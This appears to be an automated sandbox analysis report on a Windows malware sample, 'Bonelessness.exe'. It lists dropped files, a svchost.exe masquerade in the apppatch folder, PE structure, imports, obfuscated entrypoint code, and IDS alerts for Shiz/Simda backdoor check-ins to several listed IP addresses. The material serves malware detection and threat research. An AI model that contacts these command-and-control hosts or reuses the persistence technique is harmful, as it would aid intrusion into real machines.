Preview:	...[..A.9l.....\|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g.Z.".....O.m..-..&.u....v.....m...^.c..L.i..pZ..L#..E2..E..r..1.+..}.p.3...iH5.&f..`r..Y.p..c....p.D.l.n .)..%..l...p.....s......h...e....g.5..I.....<#.;/..5Z..r.@....t..`dU:....G+U..Y..,..\X.R......... T.!.J..s..,.%.-.....h..U..OT...f.h._..zf..^.".1.D.)"<..]Z.9..`..f4P..C\...@..n.'...li?=...I....{G...j.R.L5.JK=....S..6.BJ_Y_.((.IFb....,.>..w...........$"..~...5..gk..~.07u.....7O...&.IlU.O..b.@.%.(9....j...d.%.7c.#{K,.......6.V..Q0.....Ot.r.'.f.p.[.A.<..l@.".).....4.......].J.H.tN'..M.&..n.k.;.S.b.7...........J..f(....b.<....>.....NdIWm....{...(;$H....<.............l..+~..o.Nk.N...O...E..F.'%..s.#...\..{S...DE7*aX...~o.......#...f....c.K..B.M.b;..Jom.........Z..t.Y....l....n.O.pn...&..$&.........<.........0.,.M.3.........SCb..&\.L..Y.C.vD.(./...$u.V.=......U".~..

C:\Users\user\AppData\Local\Temp\6818.tmp

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	25126
Entropy (8bit):	7.98341092582159
Encrypted:	false
SSDEEP:	384:EHRva/n308nlnFMirDjlH/6QiOyNGXhnCvdqB2ENIvwl/OZ/Ph4+crtJt7/ECFjN:Etak8nl3r9HtbnCVCNl/OpUPp/ECFW6F
MD5:	461BDEC3E148639E2E9CE5528BD9474F
SHA1:	24DA229B9E2C834E4B8B730BFDA6A9387C147CDE
SHA-256:	7123863EE76057C14BD46E7A2B623A5BA7E42DB6BF196EBA601D4E6B3E8B23BA
SHA-512:	DC86EB418C9556A09BD751C1C32841B9072E7ADAC6A2BC2F9AF9A3D53122B81D892461A97B209EBD137D96A73D4FEFE8FFE6DAF1E28E3D2DD3DC9CD28C0B603A
Malicious:	false
Preview:	...[..A.9l.....\|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g...y.......9..W..h............S...dW[+.XP{.+c-Y.AE..T7..].S<.....;....d. `.mk.=.tI..`r..Y.p..c....p.D.l.n .)..%..l...p.....s......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....fY..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J...\|..d\|..m.3 $...x......0.Ww.....l.h.j.m-...~..+.#..v{.!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.*....n.+.......+FA..mc....:[c.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..

C:\Users\user\AppData\Local\Temp\6859.tmp

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	481
Entropy (8bit):	7.562219197329084
Encrypted:	false
SSDEEP:	12:NGjx1vBGFaAKSM9FVyxVFMqiEAzTjCE7x3UOn4rN:MfvsFDKPMhMqnAzSCU4a
MD5:	12C0B717F2C7635A939EA3983996CC9D
SHA1:	E9F5A230A788A8E7A3E9250D26FB2278889178A9
SHA-256:	BA5D229C372021666B90D7FD751FA6DD77FA1C1379A1DB0329FA6278B8B65A13
SHA-512:	422E5A1B5E7F9077739ACD977DADF7D91D01622EDF9CB93827C2349D7212049AF35C548C6335D8762C35E7B5B0C1C9F0D3C7E6881BA503199496DC8ED41DE1A5
Malicious:	false
Preview:	....tp.y)x`.T...x.6.wz.&.=Y..M4.".....+.....+.AQ....8.5...n',)...Q...k....C%!.;.l}..m#.=..R-a7...o.......L.?.sG..Z.Y....f.....D...#=.....D...^."..."..0>.Y..z0L....N{.VB+......4.@..N..=.v.:...:.(..m..[.x-.d,C.(pU}.r...B...Y.fs.'..?../.\..X.k>...qz..3>...R..."f.\|..^.~.\|.xg..~.In.w...}.."..U.....FB............_.R....}...?..GA..eC(\.V..e...!7.....8#^=.z......J.T..?...e...$R.7l.Y:?f.P~.:."......s...H......cC2.T^.{{....+.m.R..~iE.J..t...v..t;C..R_......$.(...ej

C:\Users\user\AppData\Local\Temp\F5FB.tmp

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	593
Entropy (8bit):	7.626935561277827
Encrypted:	false
SSDEEP:	12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
MD5:	926512864979BC27CF187F1DE3F57AFF
SHA1:	ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
SHA-256:	B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
SHA-512:	F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
Malicious:	false
Preview:	....tp.-$\|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..\|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n\|..h_s.n....r..I..U.T..%N$.B..jj.\.....Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj....H.H...?G..O..tE..9..%.<+<......_.w..S....

C:\Users\user\AppData\Local\Temp\F716.tmp

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	25019
Entropy (8bit):	7.981231117049654
Encrypted:	false
SSDEEP:	384:nARva/n308nlnFMirDjlH/6QiOyNGQMp0I/221czmWLtTBsI6WsXI0o3C+0A:n4ak8nl3r9Htbp0gc/s/Ho3CVA
MD5:	1CC73FD531132773CB4B8B32224E0B75
SHA1:	6907F8E87C28568D43BAF43A91FC84BD485BC4CD
SHA-256:	B156E1BF76080AA763F83B47F4B67E78F94DF8721D5D0130C97087529195D005
SHA-512:	A7A27D85896D384861CA69D2E2AEA8F6460E58AFDD7BFDDC91108E0C43207970E3CD0DAEFC14F7248703760DA1EB961D1194B91DEC40CA9DC74F46B306A7DCEE
Malicious:	false
Preview:	...[..A.9l.....\|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g.$.%......P.C..(......:..e>....M....s3v/.2}.q'd..X'..8.../.fq.+.....u.~.'H.R.g..J]..`r..Y.p..c....p.D.l.n .)..%..l...p.....a......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....tW..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J...\|..d\|..\|.9 6...x......0.Ww.....l.h.j.m-...~..+.#..v{.!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.....n.+.......+FA..mc....:Im.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..

C:\Windows\apppatch\svchost.exe

Download File

Process:	C:\Users\user\Desktop\Bonelessness.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	213504
Entropy (8bit):	7.832692092575605
Encrypted:	false
SSDEEP:	6144:7JRDxRqdSqQts6iRZsTZuDbhivDVDN8zqF3:7cjQKUZigDVJ5
MD5:	579DA5BACB532A6B1670BE4418070F62
SHA1:	36BDCEB0C09265C5CE44E78FA0D119206CF73964
SHA-256:	4DF5F54B69B3F06A10CAAE2D02A298E8DEFD85B9010C7B787AECFBF5A203EDEB
SHA-512:	B4BC147B1BF581E56AB930EDAF26A90419CCE051577F1897473FD8B94BAE16214D77914E7141FEAD6712CFCD7893EC2F817FC79560237D83B3F34BB1CCC6A1C0
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..:.................4......8....0...0........@..................................).].....................................q.......P.........................n...\................................................................................ZYkKE..............................@..@.peSRE...3...0...4... .............. ..`.ig.....aC...p.......T..............@..@.data............ ...b..............@....LI................................@..@.rsrc.......P......................@..@.reloc..n............>..............@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Windows\apppatch\svchost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Bonelessness.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.832692637897904
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Bonelessness.exe
File size:	213'504 bytes
MD5:	475feaf47584ea0673437174181f5019
SHA1:	be7f60898bf6e108aadc370b7ba9c3135bbfb4ee
SHA256:	55bfe580ad47b8c5981ee39c1b267903ded5888ae93c474b19e31f18caa05e51
SHA512:	4165c63f466939b7c38174315928f9acca949e2cbc523b7bb67c6ecd27ea34b1ed67d735af18dc39904c29e4c795cb5d90ce14ef1608260a01b4dc1e7529dc66
SSDEEP:	6144:KJRDxRqdSqQts6iRZsTZuDbhivDVDN8zqF3:KcjQKUZigDVJ5
TLSH:	202412B375D6A8EFFA560E7A95BEAD0868FC1CC14B6B45752D003936BCB3402F416C92
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..:.................4......8....0...0........@...................................^2...................................

File Icon


Icon Hash:	52ea989898981d99

Static PE Info

General

Entrypoint:	0x403000
Entrypoint Section:	.peSRE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x3A15F751 [Sat Nov 18 03:28:17 2000 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	91c8557273d46cefa6ad80b57deb236d

Entrypoint Preview

Instruction
mov eax, 00000000h
push 00000000h
pop ebp
push ebp
mov dword ptr [0040C684h], 00000000h
mov edx, dword ptr [0040C684h]
push edx
call dword ptr [00407048h]
mov dword ptr [0040C687h], eax
push 735C6767h
pop eax
mov dword ptr [0040C27Bh], 00000000h
mov esi, dword ptr [0040C27Bh]
push esi
mov dword ptr [0040C00Eh], 00000000h
mov edx, dword ptr [0040C00Eh]
push edx
call dword ptr [00407048h]
mov dword ptr [0040C8ECh], eax
mov ebx, 30D788ADh
mov eax, ebx
mov eax, 00000000h
and eax, 0FFFFFFFh
test dword ptr [0040C29Bh], eax
jne 00007F48588C7173h
mov esi, 000019E6h
xor esi, eax
mov edi, 0000012Eh
sub eax, edi
shl eax, 03h
add dword ptr [0040C460h], eax
xor ebx, ebx
and ebx, 000000FFh
or ebx, dword ptr [0040C3DFh]
je 00007F48588C7162h
mov esi, 00001F4Ah
xor esi, ebx
add ebx, 00000403h
je 00007F48588C7163h
inc ebx
shr ebx, 1
push ebx
pop dword ptr [0040C882h]
mov dword ptr [0040C6E5h], ebx
mov edx, 00000027h
sub edx, 57E67618h
jne 00007F48588C725Dh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x71f8	0xdc	.ig
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe5000	0xadec	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf0000	0x36e	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6cc5c	0x1c	.LI
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.ZYkKE	0x1000	0x1a9f	0x1a9f	271cc19fdeee5d95e9758d8f976dfe1f	False	0.7970652971386647	data	6.397417124781268	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.peSRE	0x3000	0x339a	0x3400	6e0f6cceb67bc2e4e4abe713c2c624c4	False	0.6909555288461539	COM executable for DOS	6.060047228899006	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.ig	0x7000	0x4361	0xe00	f4d08e0a40e61eacb8469ba4d5fa6113	False	0.45591517857142855	data	4.874628177058625	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x5f514	0x22000	ec74f7c616ff52d4f195ea701cd8ed8f	False	0.9882166245404411	data	7.9817820356059626	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.LI	0x6c000	0x787c3	0xe00	944e23da79393d3719209e04377751b8	False	0.8130580357142857	data	6.5278326059652105	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xe5000	0xadec	0xae00	d58882b27e7579e4d4637b8cefff2405	False	0.9572781968390804	data	7.768024831380774	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf0000	0x36e	0x400	7f71000ea8c08019c48bfd973cc55da0	False	0.859375	data	6.474763234435723	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xe53dc	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6414165103189493
RT_MENU	0xe6484	0x52	data	English	United States	0.9390243902439024
RT_MENU	0xe64d8	0x2e	data	English	United States	1.0869565217391304
RT_DIALOG	0xe6508	0x52	data	English	United States	0.975609756097561
RT_RCDATA	0xe655c	0x1890	data	English	United States	1.0017493638676844
RT_RCDATA	0xe7dec	0x29ed	data	English	United States	1.001024876548961
RT_RCDATA	0xea7dc	0x524e	data	English	United States	1.0007593735168485
RT_RCDATA	0xefa2c	0x33	data	English	United States	1.2156862745098038
RT_RCDATA	0xefa60	0x4f	data	English	United States	1.139240506329114
RT_RCDATA	0xefab0	0x57	data	English	United States	1.1264367816091954
RT_RCDATA	0xefb08	0x4b	data	English	United States	1.1466666666666667
RT_RCDATA	0xefb54	0x61	data	English	United States	1.1134020618556701
RT_GROUP_ICON	0xefbb8	0x14	data	English	United States	1.1
RT_VERSION	0xefbcc	0x220	data	English	United States	0.5294117647058824

Imports

DLL	Import
KERNEL32.DLL	FindAtomA, SetCalendarInfoA, FindResourceA, lstrcmp, GetDateFormatW, SetCurrentDirectoryA, CopyFileA, DisconnectNamedPipe, LoadLibraryA, SuspendThread, GetProcAddress
user32.dll	PostQuitMessage, SetFocus, RemoveMenu, EnumChildWindows, MessageBoxIndirectW, GetDC, LoadMenuW, GetActiveWindow, LoadMenuA, EnumDesktopWindows, RegisterWindowMessageA, GetWindowTextW, EnumDesktopsW, GetClassNameA, LoadCursorA, GetWindowTextA, GetTopWindow, LoadBitmapA, GetMenuInfo, GetCapture, wvsprintfA, SetCursorPos, IsDlgButtonChecked, GetMenuStringW, CheckMenuRadioItem, DestroyWindow, SetActiveWindow, AppendMenuW, GetDlgItemTextW, UpdateLayeredWindow, IsChild, CreateDialogParamW, GetMenuStringA, ShowCaret, GetKeyState, GetCaretPos, GetCapture, CreateWindowExA, CheckDlgButton, GetIconInfo, CopyImage, WinHelpA, CopyIcon, DialogBoxParamA, GetDC
gdi32.dll	GetGlyphIndicesA, GetColorAdjustment, GetTextCharset, GetTextColor, CreatePen, SetSystemPaletteUse, SwapBuffers, GetICMProfileA, GetFontUnicodeRanges, StartPage, CreateDCA, SetWinMetaFileBits
advapi32.dll	RegCreateKeyExA, RegDeleteKeyW, RegEnumValueA, RegOpenKeyExA, RegDeleteValueA, RegCreateKeyExW, RegOpenKeyW
shell32.dll	SHGetDataFromIDListA, SHGetFileInfoW
shlwapi.dll	PathRemoveBlanksW, UrlHashA, PathIsDirectoryEmptyW, StrStrNIW, StrCmpNA, PathIsContentTypeA, PathAppendA, PathRemoveBackslashA, PathSkipRootA, PathGetDriveNumberW, PathSearchAndQualifyW
ole32.dll	CoUninitialize
INETCOMM.DLL	HrGetLastOpenFileDirectory, MimeEditIsSafeToRun, EssSecurityLabelDecodeEx, CreateSMTPTransport, HrDoAttachmentVerb, MimeOleGetDefaultCharset, MimeOleSMimeCapsFull
oledlg.dll	OleUIChangeSourceA, OleUIUpdateLinksW, OleUIConvertW, OleUIObjectPropertiesA, OleUIUpdateLinksA, OleUIBusyA, OleUIPasteSpecialA, OleUIEditLinksW
crypt32.dll	CryptStringToBinaryA, PFXExportCertStore, CertCreateContext, CertGetCRLFromStore, CertFindChainInStore, CertFindAttribute, RegOpenHKCUKeyExU, I_CertUpdateStore, CertGetIntendedKeyUsage, CertDuplicateCRLContext, CryptMsgControl, CryptBinaryToStringA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-23T18:47:41.392344+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50749	80	192.168.2.4	64.225.91.73
2024-08-23T18:47:41.392344+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50749	80	192.168.2.4	64.225.91.73
2024-08-23T18:47:01.589447+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49735	80	192.168.2.4	3.64.163.50
2024-08-23T18:47:01.589447+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49735	80	192.168.2.4	3.64.163.50
2024-08-23T18:47:01.518762+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	60209	80	192.168.2.4	44.221.84.105
2024-08-23T18:47:01.518762+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	60209	80	192.168.2.4	44.221.84.105
2024-08-23T18:47:41.908933+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	54206	1.1.1.1	192.168.2.4
2024-08-23T18:47:52.906016+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64285	80	192.168.2.4	91.195.240.19
2024-08-23T18:48:59.720188+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56393	80	192.168.2.4	69.162.80.58
2024-08-23T18:48:59.720188+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56393	80	192.168.2.4	69.162.80.58
2024-08-23T18:47:00.817565+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	53971	1.1.1.1	192.168.2.4
2024-08-23T18:47:52.139890+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64276	80	192.168.2.4	18.208.156.248
2024-08-23T18:47:52.139890+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64276	80	192.168.2.4	18.208.156.248
2024-08-23T18:49:00.092910+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56396	80	192.168.2.4	91.195.240.19
2024-08-23T18:47:39.077058+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	51130	80	192.168.2.4	154.85.183.50
2024-08-23T18:47:39.077058+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	51130	80	192.168.2.4	154.85.183.50
2024-08-23T18:47:02.071829+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49736	80	192.168.2.4	199.191.50.83
2024-08-23T18:47:02.071829+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49736	80	192.168.2.4	199.191.50.83
2024-08-23T18:47:01.728464+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49651	80	192.168.2.4	18.208.156.248
2024-08-23T18:47:01.728464+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49651	80	192.168.2.4	18.208.156.248
2024-08-23T18:48:37.314742+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64303	80	192.168.2.4	154.85.183.50
2024-08-23T18:48:37.314742+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64303	80	192.168.2.4	154.85.183.50
2024-08-23T18:47:16.686195+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	51111	80	192.168.2.4	18.208.156.248
2024-08-23T18:47:16.686195+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	51111	80	192.168.2.4	18.208.156.248
2024-08-23T18:47:41.773244+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	63402	1.1.1.1	192.168.2.4
2024-08-23T18:47:42.016225+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	56536	1.1.1.1	192.168.2.4
2024-08-23T18:48:55.045463+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50027	80	192.168.2.4	52.34.198.229
2024-08-23T18:48:55.045463+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50027	80	192.168.2.4	52.34.198.229
2024-08-23T18:47:17.325618+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	51114	443	192.168.2.4	188.114.97.3
2024-08-23T18:47:54.006576+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64286	443	192.168.2.4	188.114.96.3
2024-08-23T18:48:56.952582+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49517	80	192.168.2.4	44.221.84.105
2024-08-23T18:48:56.952582+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49517	80	192.168.2.4	44.221.84.105
2024-08-23T18:48:24.434472+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64290	80	192.168.2.4	188.114.97.3
2024-08-23T18:48:24.434472+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64290	80	192.168.2.4	188.114.97.3
2024-08-23T18:47:52.643227+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49736	80	192.168.2.4	199.191.50.83
2024-08-23T18:47:52.643227+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49736	80	192.168.2.4	199.191.50.83
2024-08-23T18:47:38.147643+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	51125	80	192.168.2.4	44.221.84.105
2024-08-23T18:47:38.147643+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	51125	80	192.168.2.4	44.221.84.105
2024-08-23T18:48:52.579521+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50118	80	192.168.2.4	72.52.179.174
2024-08-23T18:48:52.579521+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50118	80	192.168.2.4	72.52.179.174
2024-08-23T18:47:02.493738+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49657	80	192.168.2.4	172.234.222.143
2024-08-23T18:47:02.493738+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49657	80	192.168.2.4	172.234.222.143
2024-08-23T18:47:44.031380+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	61998	1.1.1.1	192.168.2.4
2024-08-23T18:47:47.309576+0200	TCP	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	80	63803	52.34.198.229	192.168.2.4
2024-08-23T18:47:47.309576+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	80	63803	52.34.198.229	192.168.2.4
2024-08-23T18:47:01.618857+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49733	80	192.168.2.4	208.100.26.245
2024-08-23T18:47:01.618857+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49733	80	192.168.2.4	208.100.26.245
2024-08-23T18:47:51.282502+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	54974	1.1.1.1	192.168.2.4
2024-08-23T18:49:00.831770+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56389	80	192.168.2.4	199.191.50.83
2024-08-23T18:49:00.831770+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56389	80	192.168.2.4	199.191.50.83
2024-08-23T18:47:01.473287+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49733	80	192.168.2.4	208.100.26.245
2024-08-23T18:47:01.473287+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49733	80	192.168.2.4	208.100.26.245
2024-08-23T18:48:29.319176+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64296	443	192.168.2.4	188.114.97.3
2024-08-23T18:47:02.186519+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49655	80	192.168.2.4	69.162.80.60
2024-08-23T18:47:02.186519+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49655	80	192.168.2.4	69.162.80.60
2024-08-23T18:48:51.934696+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50117	80	192.168.2.4	72.52.179.174
2024-08-23T18:48:51.934696+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50117	80	192.168.2.4	72.52.179.174
2024-08-23T18:48:59.438927+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56392	80	192.168.2.4	3.94.10.34
